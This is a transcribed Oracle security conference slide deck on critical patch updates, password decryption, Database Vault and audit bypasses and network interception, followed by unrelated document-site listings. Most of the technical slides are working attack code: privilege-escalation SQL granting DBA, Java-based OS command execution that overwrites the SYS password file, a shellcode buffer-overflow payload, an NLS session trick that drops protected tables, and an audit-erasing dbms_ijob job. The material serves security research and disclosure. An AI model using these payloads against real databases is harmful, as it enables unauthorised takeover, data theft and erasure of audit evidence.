Best of Oracle Security by Red-Database-Security
|
|
- Primrose Booth
- 6 years ago
- Views:
Transcription
1 Best of Oracle Security by Red-Database-Security
2 Introduction Oracle Critical Patch Updates Passwords & Encryption Auditing & Database Vault Intercept network traffic PL/SQL Unwrapper
3 Oracle Critical Patch Updates January 2010 CPU (9 Vulnerabilities) April 2010 CPU (8 Vulnerabilities) July 2010 CPU (6 Vulnerabilities) October 2010 CPU (8 Vulnerabilities)
4 January 2010 CPU* Listener Bug (CVE ) + Exploit Code** published APEX 3.2 bug fixes. Many APEX security bugs are silently fixed with 4.0 Additional bugs in Oracle Spatial, Logical standby, data pump and OLAP fixed * **
5 April 2010 CPU* Critical Java Bug (0day) fixed Auditing bug fixed XML DB bug fixed
6 dbms_jvm_exp_perms ( ) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT GRANT,USER(), SYS, java.io.filepermission, <<ALL FILES>>, execute, ENABLED from dual; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / select dbms_java.runjava( oracle/aurora/util/wrapper c:\ \windows\\system32\\cmd.exe /c dir>c:\\out.lst )from dual;
7 July 2010 CPU* Remote exploitable listener bug OLAP APEX Export
8 October 2010 CPU* Enterprise Manager SQL Injection JVM bug Change Data Capture (+ Exploit published) Job Queue - Bypass Oracle Auditing OLAP *
9 dbms_cdc_publish ( ) create or replace function pwn return varchar2 authid current_user is PRAGMA autonomous_transaction; BEGIN execute immediate grant dba to scott ; commit; return z ; END; grant execute on SCOTT.pwn to public begin sys.dbms_cdc_publish.create_change_set( a', a', a SCOTT.pwn () a,'y,sysdate, sysdate); end;
10 Password & Encryption Get Oracle clear text password on server on client Decrypt DB Link passwords Decrypt EM encrypted passwords Decrypt TDE encrypted data Oracle TDE & AES-NI New Password Cracker
11 Get Oracle Clear Text Password Inject a custom DLL/LIB in the Oracle process space Intercept the hashing function calls in the memory Oracle is passing the clear text password and this will be printed Not detectable from the database Code available for Windows and Linux
12 Get Clear Text Passwords
13 Demonstration
14 Decrypt DB Link Passwords Oracle 8-9 database link passwords were stored in clear text in SYS.LINK$ Since Oracle 10g the passwords are encrypted There are at least 3 different approaches available to decrypt the passwords
15 Decrypt DB Link Passwords
16 Decrypt EM Passwords Older versions of EM used the SYSMAN.DECRYPT function to get the cleartext password select credential_set_column, sysman.decrypt(credential_value) from SYSMAN.MGMT_CREDENTIALS2; Newer versions
17 Decrypt EM Passwords II
18 Decrypt EM Passwords III
19 Decrypt TDE encrypted Data By using the DLL injection it is possible to log the wallet password and the master key This master key can be used to decrypt the tablespace and/or the table keys Using an external tool it is possible to decrypt the encrypted data file using the master key *
20 Demonstration
21 New Password Cracker OPS_SSE2 Fastest SW-solution so far Up to 42 million passwords / sec on a Core i7-980x@3.8 GHz 7 alphanumeric characters, 31 minutes 8 alphanumeric characters, 19 hours 9 alphanumeric characters, 28 days *
22 AES-NI & TDE " AES-NI is an instruction set of new Intel processors which improve the encryption/ decryption via hardware. " Oracle 11g and Transparent Data Encryption (TDE) in AES-256 CBC: The usage of the optimized Intel Integrated Performance Primitives (IPP) shows an 89 percent reduction (3.33 GHz Xeon X5680 vs 2.8 Intel Xeon X5560) against a previous processor.
23 Oracle Database Vault & Auditing Bypass Oracle Database Vault Bypass Oracle Auditing *
24 Bypass Oracle Database Vault* Different techniques to bypass Oracle Database Vault Switch it off on OS Level Via buffer overflows Via alter session *
25 Bypass using Java I EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'writefiledescriptor', '' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'readfiledescriptor', '' ); CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS import java.lang.*; import java.io.*; public class ExecuteOS { public static void execoscmd (String cmd) throws IOException, java.lang.interruptedexception { String[] strcmd = {"cmd.exe", "/c", cmd}; Process p = Runtime.getRuntime().exec(strCmd); p.waitfor(); } }; /
26 Bypass using Java II CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2) AS LANGUAGE JAVA NAME 'ExecuteOS.execOSCmd (java.lang.string)'; / Execute OS commands: EXEC PROC_EXECUTEOS ('C:\app\Administrator\product \11.2.0\dbhome_1\BIN\orapwd.exe file=c:\app\administrator \product\11.2.0\dbhome_1\database\pwdorcl.ora force=y password=anypass nosysdba=n'); EXEC PROC_EXECUTEOS ('ren C:\app\Administrator\product \11.2.0\dbhome_1\BIN\oradv11.dll oradv11_.dll');
27 Bypass using Buffer Overflow DECLARE OS_COMMAND VARCHAR2(504); RET_VALUE_X123 VARCHAR2(32767); P_DIRPATH VARCHAR2(32767); BEGIN -- Disable DB Vault: OS_COMMAND:='ren..\bin\oradv10.dll oradv10_.dll'; -- Enable SYSDBA access and overwrite SYS password: OS_COMMAND:='..\bin\orapwd.exe file=..\dbs\orapworcl force=y nosysdba=n password=anypass ; P_DIRPATH := ' chr(54) chr(141) chr(67) chr(19) chr(80) chr(184) chr(131) chr(160) chr(187) chr(119) chr(255) chr(208) chr(184) chr(31) chr(179) chr(188) chr(119) chr(255) chr(208) RPAD(OS_COMMAND chr(38), 505) CHR(96) CHR(221) CHR (171) CHR(118); RET_VALUE_X123 := SYS.KUPF$FILE_INT.GET_FULL_FILENAME(DIRPATH => P_DIRPATH, NAME => 'B', EXTENSION => '', VERSION => ''); END; /
28 Bypass using alter session SQL> connect onedba/onedba Connected. SQL> drop table hr.jobs cascade constraints; drop table hr.jobs cascade constraints * ERROR at line 1: ORA-00604: error occurred at recursive SQL level 1 ORA-47401: Realm violation for drop table on HR.JOBS ORA-06512: at DVSYS.AUTHORIZE_EVENT, line 55 ORA-06512: at line 13 Switch to a different NLS_LANGUAGE SQL> alter session set NLS_LANGUAGE= LATIN AMERICAN SPANISH ; Session altered. SQL> drop table hr.jobs cascade constraints; Table dropped.
29 Bypass Oracle Auditing Via Explain plan (fixed in April 2010 CPU) Using dbms_ijob (fixed in Oct 2010 CPU)
30 Bypass Auditing using dbms_ijob Declare jj integer := ; job number Begin sys.dbms_ijob.submit( JOB => jj, LUSER => 'SYS', PUSER => 'SYS', CUSER => 'SYS, NEXT_DATE => sysdate, INTERVAL => null, BROKEN => false, WHAT => declare jj integer := ' jj ; begin execute immediate ''alter system archive log current' ; sys.dbms_ijob.remove(jj); delete from sys.aud$ where obj$name = ''DBMS_IJO''; commit; end;, NLSENV => 'NLS_LANGUAGE=''AMERICAN'' NLS_TERRITORY=''AMERICA'' NLS_CURRENCY=''$'' NLS_ISO_CURRENCY=''AMERICA'' NLS_NUMERIC_CHARACTERS=''.,'' NLS_DATE_FORMAT=''DD-MON-RR'' NLS_DATE_LANGUAGE=''AMERICAN'' NLS_SORT=''BINARY'', ENV => hextoraw(' )); sys.dbms_ijob.run(jj); exception when others then if sqlcode= then sys.dbms_ijob.remove(jj); end if; Raise; end; /
31 Intercept Network Traffic Vamp Villanious ARP Manipulation Program Packet Injection Thicknet
32 VAMP Arpspoofing program Doing ARP request poising Request SHA: Source MAC (requestor) SIP: Source IP THA: Target MAC (usually unknown, 0) TIP: Target IP (IP requestor is looking for) Who has (00:00:00:00:00:00)? Tell (00:00:0d:ef:ac:ed)
33 Packet Injection 2 types of injection: packet modification and takeover Packet modification: client or server sends data attacker is modifying it Takeover Allows us to send arbitrary packets into the session Issue asynchronus SQL queries,
34 Thicknet After an established connection, Thicknet can manipulate active Oracle sessions (e.g. create a new user inside of a session)
35 Demonstration
36 PL/SQL Unwrapper First public unwrapper for 10g/11g code was published Python Script* *
37 Unwrapper #!/usr/bin/python # Contact: niels at teusink net / blog.teusink.net # License: Public domain import re Import base64 import zlib import sys # simple substitution table charmap = [0x3d, 0x65, 0x85, 0xb3, 0x18, 0xdb, 0xe2, 0x87, 0xf1, 0x52, 0xab, 0x63, 0x4b, 0xb5, 0xa0, 0x5f, 0x7d, 0x68, 0x7b, 0x9b, 0x24, 0xc2, 0x28, 0x67, 0x8a, 0xde, 0xa4, 0x26, 0x1e, 0x03, 0xeb, 0x17, 0x6f, 0x34, 0x3e, 0x7a, 0x3f, 0xd2, 0xa9, 0x6a, 0x0f, 0xe9, 0x35, 0x56, 0x1f, 0xb1, 0x4d, 0x10, 0x78, 0xd9, 0x75, 0xf6, 0xbc, 0x41, 0x04, 0x81, 0x61, 0x06, 0xf9, 0xad, 0xd6, 0xd5, 0x29, 0x7e, 0x86, 0x9e, 0x79, 0xe5, 0x05, 0xba, 0x84, 0xcc, 0x6e, 0x27, 0x8e, 0xb0, 0x5d, 0xa8, 0xf3, 0x9f, 0xd0, 0xa2, 0x71, 0xb8, 0x58, 0xdd, 0x2c, 0x38, 0x99, 0x4c, 0x48, 0x07, 0x55, 0xe4, 0x53, 0x8c, 0x46, 0xb6, 0x2d, 0xa5, 0xaf, 0x32, 0x22, 0x40, 0xdc, 0x50, 0xc3, 0xa1, 0x25, 0x8b, 0x9c, 0x16, 0x60, 0x5c, 0xcf, 0xfd, 0x0c, 0x98, 0x1c, 0xd4, 0x37, 0x6d, 0x3c, 0x3a, 0x30, 0xe8, 0x6c, 0x31, 0x47, 0xf5, 0x33, 0xda, 0x43, 0xc8, 0xe3, 0x5e, 0x19, 0x94, 0xec, 0xe6, 0xa3, 0x95, 0x14, 0xe0, 0x9d, 0x64, 0xfa, 0x59, 0x15, 0xc5, 0x2f, 0xca, 0xbb, 0x0b, 0xdf, 0xf2, 0x97, 0xbf, 0x0a, 0x76, 0xb4, 0x49, 0x44, 0x5a, 0x1d, 0xf0, 0x00, 0x96, 0x21, 0x80, 0x7f, 0x1a, 0x82, 0x39, 0x4f, 0xc1, 0xa7, 0xd7, 0x0d, 0xd1, 0xd8, 0xff, 0x13, 0x93, 0x70, 0xee, 0x5b, 0xef, 0xbe, 0x09, 0xb9, 0x77, 0x72, 0xe7, 0xb2, 0x54, 0xb7, 0x2a, 0xc7, 0x73, 0x90, 0x66, 0x20, 0x0e, 0x51, 0xed, 0xf8, 0x7c, 0x8f, 0x2e, 0xf4, 0x12, 0xc6, 0x2b, 0x83, 0xcd, 0xac, 0xcb, 0x3b, 0xc4, 0x4e, 0xc0, 0x69, 0x36, 0x62, 0x02, 0xae, 0x88, 0xfc, 0xaa, 0x42, 0x08, 0xa6, 0x45, 0x57, 0xd3, 0x9a, 0xbd, 0xe1, 0x23, 0x8d, 0x92, 0x4a, 0x11, 0x89, 0x74, 0x6b, 0x91, 0xfb, 0xfe, 0xc9, 0x01, 0xea, 0x1b, 0xf7, 0xce] def decode_base64_package(base64str): base64dec = base64.decodestring(base64str)[20:] # we strip the first 20 chars (SHA1 hash, I don't bother checking it at the moment) decoded = for byte in range(0, len(base64dec)): decoded += chr(charmap[ord(base64dec[byte])]) return zlib.decompress(decoded) sys.stderr.write("=== Oracle 10g/11g PL/SQL unwrapper by Niels Teusink - blog.teusink.net ===\n\n" ) if len(sys.argv) < 2: sys.stderr.write("usage: %s infile.plb [outfile]\n" % sys.argv[0]) sys.exit(1) infile = open(sys.argv[1]) outfile = None if len(sys.argv) == 3: outfile = open(sys.argv[2], 'w ) lines = infile.readlines() for i in range(0, len(lines)): # this is really naive parsing, but works on every package I've thrown at it matches = re.compile(r"^[0-9a-f]+ ([0-9a-f]+)$").match(lines[i]) if matches: base64len = int(matches.groups()[0], 16) base64str = j = 0 while len(base64str) < base64len: j+=1 base64str += lines[i+j] base64str = base64str.replace("\n"," ) if outfile: outfile.write(decode_base64_package(base64str) + "\n ) else: print decode_base64_package(base64str)
38 Summary Oracle out-of-box Security is getting better (especially with ) Attackers are looking for more creative ways to bypass Oracle security (e.g. Man in the middle, DLL Injection) Tools are getting faster / easier to use
39 Thank you Contact: Red-Database-Security GmbH Bliesstr. 16 D Neunkirchen Germany
GNetPlus Communication Protocol
Basic Package (BINARY VERSION) Master Query Package (HOST) Field Header Address Query Function Data length DATA BYTES Error Check Desc SOH 0~255 0~255 0~255 CRC16_Low CRC16_Hi Size 1 BYTE 1 BYTE 1 BYTE
More informationKeywords: CRC, CRC-7, cyclic redundancy check, industrial output, PLC, programmable logic controller, C code, CRC generation, microprocessor, switch
Keywords: CRC, CRC-7, cyclic redundancy check, industrial output, PLC, programmable logic controller, C code, CRC generation, microprocessor, switch APPLICATION NOTE 6002 CRC PROGRAMMING FOR THE MAX14900E
More informationCTT MODBUS-RTU COMMUNICATION PROTOCOL TEMPERATURE MONITOR DEVICE
INSTRUCTION MANUAL IM149-U v0.92 CTT MODBUS-RTU COMMUNICATION PROTOCOL TEMPERATURE MONITOR DEVICE Firmware version: v3.0 or higher MODBUS PROTOCOL Modbus is a master-slave communication protocol able to
More informationvariable 1. Start of Packet - is used to provide synchronization when parsing packets. Always 0xFC
DreamScreen V2 WiFi UDP Protocol The DreamScreen-WiFi platform uses UDP unicasting and broadcasting over the WLAN to provide communication. Port 8888 is used for both sending and receiving. The DreamScreen
More informationMTR-4. C8 Command to MODBUS Bridge User Manual F-1, No. 631, Chung Der Road, Sec 1, Taichung Taiwan.
MTR-4 C8 Command to MODBUS Bridge User Manual 404 19F-1, No. 631, Chung Der Road, Sec 1, Taichung Taiwan. TEL:886-4-2238-0698 FAX:886-4-2238-0891 Web Site:http://www.monicon.com.tw E-mail: sales@monicon.com.tw
More informationvariable 1. Start of Packet - is used to provide synchronization when parsing packets. Always 0xFC
DreamScreen V2 WiFi UDP Protocol Rev 2 The DreamScreen-WiFi platform uses UDP unicasting and broadcasting over the WLAN to provide communication. Port 8888 is used for both sending and receiving. The DreamScreen
More informationChapter 2: Secret Key
Chapter 2: Secret Key Basics Block or Stream? Secret Key Methods Salting AES Key Entropy Prof Bill Buchanan OBE http://asecuritysite.com/crypto02 http://asecuritysite.com/encryption Conclusion Encryption
More informationMCW Application Notes 24 th February 2017
MCW Application Notes 24 th February 2017 www.motorcontrolwarehouse.co.uk Document number MCW-HEDY-001 Revision 0.1 Author Gareth Lloyd Product HEDY HD700 Title Summary HEDY HD700 Modbus Serial Communications
More informationRS-232 Control of the Advantage EQ281/8, EQ282/8 and Advantage SMS200
RS-232 Control of the Advantage EQ281/8, EQ282/8 and Advantage SMS200 Biamp Systems, 14130 N.W. Science Park, Portland, Oregon 97229 U.S.A. (503) 641-7287 an affiliate of Rauland-Borg Corp. Introduction
More informationEthernet to Digital I/O and Analog Input. (Model: IP-IO)
Ethernet to Digital I/O and Analog Input (Model: IP-IO) Feature: Operation voltage : DC 7V ~ 36V. Analog Interface: Interface : 3.3V levels compatibility. Resolution : 16-bits Σ-Δ A/D converters. Accuracy
More informationSIMCom_3G_CSD_Application Note_V1.00
SIMCom_3G_CSD_Application Note_V1.00 Document Title: SIMCom_3G_CSD_Application Note Version: 1.00 Date: Status: Document Control ID: Release SIMCom_3G_CSD_Application Note_V1.00 General Notes SIMCom offers
More informationTBS Unify Pro / SmartAudio
TBS Unify Pro / SmartAudio 02.12..2017 Revision 08 SmartAudio uses single wire half duplex communication based on UART. In Idle mode both host and VTX define the SmartAudio pin as input. If the host want
More informationTechnical Specification. Third Party Control Protocol. AV Revolution
Technical Specification Third Party Control Protocol AV Revolution Document AM-TS-120308 Version 1.0 Page 1 of 31 DOCUMENT DETAILS Document Title: Technical Specification, Third Party Control Protocol,
More informationRequest for Comments: XXXX November Registration of a Georgian Character Set draft-giasher-geostd8-00.txt
Internet draft Gia Shervashidze Network Working Group Georgian Internet Avenue Request for Comments: XXXX November 2001 Registration of a Georgian Character Set draft-giasher-geostd8-00.txt Status of this
More informationimetos LoRa Data payload structure
imetos LoRa Data payload structure Pessl Instruments, GmbH Version 1.0, 06-2018 Content 1. SCOPE OF THIS DOCUMENT... 2 2. PARSING THE DATA FROM THE PAYLOAD VERSUS API DATA ACCESS... 3 3. IMETOS LORA FIRMWARE
More informationModbus Protocol Guide for ZP2 Series Control Panels
Modbus Protocol Guide for ZP2 Series Control Panels P/N 00-3243-505-2603-01 ISS 14DEC15 Copyright Trademarks and patents Manufacturer Version REV 01 Certification 2015 UTC Fire & Security. All rights reserved.
More informationSigned/Unsigned Integer Arithmetic in C. Vineel Kovvuri
Signed/Unsigned Integer Arithmetic in C Vineel Kovvuri http://vineelkovvuri.com Contents 1 Introduction 2 2 How signed-ness is represented in the hardware? 2 3 How signed-ness is interpreted in assembly?
More informationHighlights. FP51 (FPGA based 1T 8051 core)
Copyright 2017 PulseRain Technology, LLC. FP51 (FPGA based 1T 8051 core) 10555 Scripps Trl, San Diego, CA 92131 858-877-3485 858-408-9550 http://www.pulserain.com Highlights 1T 8051 Core Intel MCS-51 Compatible
More informationRS232C Serial Interface for Pirani Diaphragm and Pirani Standard Gauges. Caution. binary 8 data bits 1 stop bit no parity bit no handshake
General Information The Serial Interface allows the communication of the digital Agilent Pirani Capacitance Diaphragm Gauges (PCG-750, PCG-752) and the digital Agilent Pirani Standard Gauges (PVG-550,
More information1 SETTING UP GENERAL FUNCTION TYPE PROTOCOL MESSAGES COMMAND RETURN CODES... 6 TRANSACTION EXAMPLES...
1 SETTING UP... 3 1.1 RS232 CONTROL CABLES...3 1.2 RS232 SETTINGS...3 2 GENERAL... 4 3 FUNCTION TYPE... 4 4 PROTOCOL MESSAGES... 4 4.1 MESSAGE FORMATS...4 4.1.1 Message Head...4 4.1.2 Message Body...5
More informationVerve IPAC Plug-in Wireless AC Module. Software Setup 3. DolphinView Software 3. Preparations 4 Transmit LINK Signals 4.
Verve IPAC Plug-in Wireless AC Module Wireless Linking & Configuration Guide Table of Contents IPAC Configuration Settings 2 Configuration Settings Reference Table 2 Software Setup 3 DolphinView Software
More informationInput Channels: 4 differential or four single-ended. Address / Baud rate / range configurable by the user
DAM-Series User Manual Amazing Electronic (HK) Limited User s Manual Overview: DAM module is a new generation data acquisition and control system based on modular embedded systems. Adopting standard DIN35
More informationHeat meter PolluStat M-bus communication protocol description
Heat meter PolluStat M-bus communication protocol description 1 1. General structure of protocol 1.1. General features of protocol Meter uses a M-bus protocol. Default baud rate: 2400 bps, Even, 1 Stop.
More informationDULCOMETER Multi-parameter Controller dialog DACa
Software manual DULCOMETER Multi-parameter Controller dialog DACa Modbus RTU EN Valid only in combination with the operating instructions for the Multi-parameter Controller dialog DACa. A2100 Please carefully
More informationDMTME Multimeters. Communication protocol. Technical specification V1.2 ABB
DMTME Multimeters Communication protocol ABB 1 Setting up DMTME serial communication.3 1.1 Serial network ID programming...3 1.2 RS-485 communication interface...3 1.3 Serial line connection...3 2 Communication
More information//
----------------------------------------------------------------------------------- Filename: FixedMath.h ----------------------------------------------------------------------------------- -----------------------------------------------------------------------------------
More informationRS-232 Control of the Advantage DRI
RS-232 Control of the Advantage DRI Biamp Systems, 14130 N.W. Science Park, Portland, Oregon 97229 U.S.A. (503) 641-7287 an affiliate of Rauland-Borg Corp. Introduction This document contains technical
More informationDiagnostic Port Serial Interface for Capacitance Diaphragm Gauges
Communication Protocol Diagnostic Port Serial Interface for Capacitance Diaphragm Gauges CDG025D-X3 4-20 ma Current Loop Stripe CDG045Dhs Stripe CDG100Dhs tira84e1 (2017-05) 1 General Information The Diagnostic
More informationUNPACKING THE PACKED UNPACKER: REVERSING AN ANDROID ANTI-ANALYSIS NATIVE LIBRARY Maddie Stone Google, USA
3 5 October UNPACKING THE PACKED UNPACKER: REVERSING AN ANDROID ANTI-ANALYSIS NATIVE LIBRARY Maddie Stone Google, USA ABSTRACT maddiestone@google.com Malware authors implement many different techniques
More informationAquaCER with TTL OUTPUT
INSTRUCTION MANUAL AquaCER with TTL OUTPUT DESCRIPTION: The AquaCER TTL is a hydrostatic pressure transmitter, with a capacitive ceramic sensor, and can withstand very high burst pressures. The applied
More informationon a 35 mm top-hat rail (in accordance with DIN EN TH35) Ambient temperature Operation: C Storage: C
Data sheet PCD1.B1020-A20 E-Line RIO 16DI, 4Rel Starting with FW 1.08.xx The L-Serie E-Line RIO modules are controlled via the RS-485 serial communication protocols S-Bus and Modbus for decentralised automation
More informationM2M/DMTME Instruments Communication protocol. Technical specification V.2.1 2CSG445011D0201
M2M/DMTME Instruments Communication protocol 2CSG445011D0201 1 Setting up M2M/DMTME serial communication... 3 1.1 Serial network ID programming... 3 1.2 RS-485 communication interface... 3 1.3 Serial line
More informationRS232C / RS485C Serial Interface for Cold Cathode and Cold Cathode Pirani Gauges
Communication Protocol RS232C / RS485C Serial Interface for Cold Cathode and Cold Cathode Pirani Gauges MAG500, MAG504 MPG500, MPG504 tira83e1-a (2017-06) 1 General Information The Serial Interface allows
More informationThe Roboteq Modbus Implementation User Manual
The Roboteq Modbus Implementation User Manual V1.1, December 21, 2017 Visit www.roboteq.com to download the latest revision of this manual Copyright 2017 Roboteq, Inc Copyright Roboteq Inc. 2018. All Rights
More informationComputer Control of the Advantage DRC 4+4
Computer Control of the Advantage DRC 4+4 Biamp Systems, 14130 N.W. Science Park, Portland, Oregon 97229 U.S.A. (503) 641-7287 an affiliate of Rauland-Borg Corp. Introduction This document contains technical
More informationGSA GAT PROTOCOL V Game Authentication Terminal
GSA GAT PROTOCOL V3.50.0 Game Authentication Terminal Gaming Standards Association GAT Technical Committee Released: 2010/12/13 Document ID: gsa-p0093.001.00 GAMINGSTANDARDS.COM GSA GAT Protocol, Document
More informationJDICON 400/500 JDICON 401/501. B Interface Description. Universal process controller
JDICON 400/500 Universal process controller JDICON 401/501 Universal profile controller Universal profile generator B 70.3570.2 Interface Description 10.99/00371593 Contents 1 Introduction 5 1.1 Preface...
More informationRS232C / RS485C Serial Interface for Pirani Capacitance Diaphragm and Pirani Standard Gauges
Communication Protocol RS232C / RS485C Serial Interface for Pirani Capacitance Diaphragm and Pirani Standard Gauges PCG550, PCG552, PCG554 PSG550, PSG552, PSG554 RS485C RS232C tira59e1-a (2017-04) 1 General
More informationApp Note Application Note: State-Driven Control of a dpasp using a Microchip PIC.
Rev: 1.0.1 Date: 8 th July 2009 App Note - 207 Application Note: State-Driven Control of a dpasp using a Microchip PIC. This application note contains a total 3 files, if you have only this pdf text document,
More informationModbus communication protocol
TIP Thüringer Industrie Produkte GmbH Bahnhofstraße 26 99842 Ruhla GERMANY Tel. : +49 (0)36929/64029-0 Fax : +49 (0)36929/64029-99 info@stromzaehler.de www.stromzaehler.de Modbus communication protocol
More informationPCD1.W5200-A20. E-Line S-Serie RIO 8AO. Features. General technical data. Dimensions and installation
Data sheet www.sbc-support.com PCD1.W5200-A20 E-Line S-Serie RI 8A The S-Serie E-Line RI modules are controlled via the RS-485 serial communication protocols S-Bus and Modbus for decentralised automation
More informationPCD1.A2000-A20. E-Line S-Serie RIO 6Rel 16A. Features. General technical data. Dimensions and installation
Data sheet www.sbc-support.com PCD1.A2000-A20 E-Line S-Serie RI 6Rel 16A The S-Serie E-Line RI modules are controlled via the RS-485 serial communication protocols S-Bus and Modbus for decentralised automation
More informationCSEE bit AES decryption. Shrivathsa Bhargav Larry Chen Abhinandan Majumdar Shiva Ramudit. Spring 2008 Project Design Document
CSEE 4840 128-bit AES decryption Shrivathsa Bhargav Larry Chen Abhinandan Majumdar Shiva Ramudit Spring 2008 Project Design Document CSEE 4840 Table of contents Abstract 1 1. Introduction 1 2. Hardware
More information// and verify that there is a sine wave with frequency <FREQUENCY> and
F330DC_IDA0_SineWave.c Copyright 2006 Silicon Laboratories, Inc. http:www.silabs.com Program Description: This program outputs a sine wave using IDA0. IDA0's output is scheduled to update at a rate determined
More informationSPARC INTERNATIONAL. Version1 SPARC Keyboard Specification
SPARC INTERNATIONAL Version1 SPARC Keyboard Specification SPARC International, Inc. 3333 Bowers Ave., Suite 280, Santa Clara, CA 95054-3913, 408-748-9111. FAX 408-748-9777 1999, SPARC International Inc.
More informationIntro (with some history) Issues ow, ow, ow, ow, ow, ow, ow, ow, Disclosure/Timeline CHIASMUS cipher
Intro (with some history) Issues ow, ow, ow, ow, ow, ow, ow, ow, Disclosure/Timeline CHIASMUS cipher We made this: Erik Tews, Julian Wälde, and me independent discovery by Felix Schuster ECB first discovered
More informationAPPENDIX- A REFERENCE IMPLEMENTATION OF BSF-128 ===============================================================
APPENDICES A p p e n d i c e s P a g e 144 A p p e n d i c e s P a g e 145 APPENDIX- A REFERENCE IMPLEMENTATION OF BSF-128 =============================================================== REFERENCE IMPLEMENTATION
More informationDescription. thanos ModBus. thanos SR ModBus
thanos ModBus & thanos SR ModBus Thermokon Sensortechnik GmbH - www.thermokon.de - email@thermokon.de 1 Index of changes Revision Date A B C 25.7.211 First draft 12.9.211 Version LQ added 22.9.211 Additional
More informationModbus Map: Conext XW/XW+ Device
Map: Conext XW/XW+ Device 503-0246-01-01 Revision A.3 UNINTENDED OPERATION WARNING The use of this product with communications requires expertise in the design, operation, and programming of the device.
More informationMotors I Automation I Energy I Transmission & Distribution I Coatings. Modbus RTU CFW701. User s Manual
Motors I Automation I Energy I Transmission & Distribution I Coatings Modbus RTU CFW701 User s Manual Modbus RTU User s Manual Series: CFW701 Language: English Document Number: 10001538593 / 00 Publication
More informationTransferable State Attack on Iterated Hashing Functions. July 26, Brian Wallace. Ballast Security
Transferable State Attack on Iterated Hashing Functions July 26, 2012 Brian Wallace Ballast Security 1 Abstract In this paper I will describe an attack on the iterated use of hashing functions used as
More informationMODBUS Communication Protocol
MODBUS Communication Protocol for counters with integrated MODBUS or ETHERNET interface 7E.78/86 0212 7E.68 0212 7E.64 0210 7E.78/86 0412 7E.68 0412 6A and 80A 3phase counters with RS485 serial communication.
More informationSecurity Analysis of Lightweight Authentication Protocol from WISTP ,2) P, Xiao FuP P, Chen Dan-weiP P, Wang Ru-chuanP
P P P Security Analysis of Lightweight Authentication Protocol from WISTP 23,2,3),2),2),2) Wang Shao-HuiP P, Xiao FuP P, hen Dan-weiP P, Wang Ru-chuanP P 2) ) P(ollege of omputer, Nanjing University of
More informationStarPRNT ios SDK User s Manual
StarPRNT ios SDK User s Manual Abstract This paper provides information about the StarPRNT ios SDK. It provides guidelines for our customers to build the StarPRNT application. Version History Release Date
More informationModbus RTU CFW100. User s Manual. Phone: Fax: Web: -
Modbus RTU CFW100 User s Manual Modbus RTU User s Manual Series: CFW100 Language: English Document Number: 10002909455 / 00 Publication Date: 06/2014 CONTENTS CONTENTS... 3 ABOUT THIS MANUAL... 5 ABBREVIATIONS
More informationTCG Algorithm Registry
Family 2.0" Level 00 Revision 01.27 September 26, 2017 Committee Draft Contact: admin@trustedcomputinggroup.org Work in Progress: This document is an intermediate draft for comment only and is subject
More informationLow visibility of Cyber Threats Invisible Attacks VPN, AD, PtH, PtT Invisible Network Traffic Google Drive, Dropbox Invisible Malware Task schedule, Wmi, Powershell 2016 Verint systems inc. All rights
More informationMODEL TDAI-2170 INTEGRATED AMPLIFIER EXTERNAL CONTROL MANUAL
MODEL TDAI-2170 INTEGRATED AMPLIFIER EXTERNAL CONTROL MANUAL Serial Settings The serial port settings are always 8 data bits, no parity and one stop bit with a baud rate of 115200. Commands and Requests
More informationBENCHTOP INSTRUMENT. Digital AC/DC Power Meter. Operation Manual V1.0
BENCHTOP INSTRUMENT Digital AC/DC Power Meter Operation Manual V1.0 Default Setup Item Default Remark Version 0 Model No. Address 1 1 ~ 255 decimal Baud Rate 96 3 bps, 6 bps, 12 bps, 24 bps, 48 bps, 96
More informationHDLC BCC 15.1 Data Link Protocol Description
Data Link Protocol Description by Daniel L. Henry Revision 1.1 October 9, 2011 Copyright 2000-2011 by Daniel L. Henry Revision History Rev. Date Changed By Reason for Change 1.0 5/9/03 Dan L. Henry Made
More informationMotors I Automation I Energy I Transmission & Distribution I Coatings. Modbus RTU CFW500. User s Manual
Motors I Automation I Energy I Transmission & Distribution I Coatings Modbus RTU CFW500 User s Manual Modbus RTU User s Manual Series: CFW500 Language: English Document Number: 10002253377 / 00 Publication
More informationAptio 5.x Status Codes
Checkpoints & Beep Codes for Debugging Document Revision 2.0 Revision Date: April 10, 2014 Public Document Copyright 2014 American Megatrends, Inc. 5555 Oakbrook Parkway Suite 200 Norcross, GA 30093 Legal
More informationID: Sample Name: Q3dY56x3hp Cookbook: defaultlinuxfilecookbook.jbs Time: 04:08:56 Date: 21/08/2018 Version:
ID: 73304 Sample : Q3dY56x3hp Cookbook: defaultlinuxfilecookbook.jbs Time: 04:08:56 Date: 21/08/2018 Version: 23.0.0 Table of Contents Table of Contents Analysis Report Overview General Information Detection
More informationRTX64. Supported Network Interface Cards
RTX64 Supported Network Interface Cards 2017 IntervalZero, Inc. IZ-DOC-X64-0088-R34 October 2017 The Supported Network Interface Cards guide lists the NIC drivers that are provided with RTX64 for use with
More informationMotors I Automation I Energy I Transmission & Distribution I Coatings. Modbus RTU CFW300. User s Manual
Motors I Automation I Energy I Transmission & Distribution I Coatings Modbus RTU CFW300 User s Manual Modbus RTU User s Manual Series: CFW300 Language: English Document Number: 10003806158 / 02 Publication
More informationADV7610 SOFTWARE MANUAL SOFTWARE MANUAL. Documentation of the Register Maps. Rev. 0
ADV7610 SOFTWAE MANUAL Documentation of the egister Maps SOFTWAE MANUAL ev. 0 April 2013 egister Map TABLE OF CONTENTS Introduction... 3 Legal Terms and Conditions... 3 1 egister Tables... 4 1.1 IO...
More informationSpecifiche generali protocollo MODBUS-RTU Rev. 10 (inglese) REVISIONS
Modbus-RTU Protocol (Mach Smart / Smart Più) Page 1 of 18 Specifiche generali protocollo MODBUS-RTU Rev. 10 (inglese) Written: U. T. ing. M. Bandini / A. Sangiorgi Verified: A. Q. sig. F. Adinolfi Approved:
More informationSoftware Manual. Applicable Models TSP100ECO TSP100GT TSP100LAN TSP100U/PUSB. Rev. 5.5
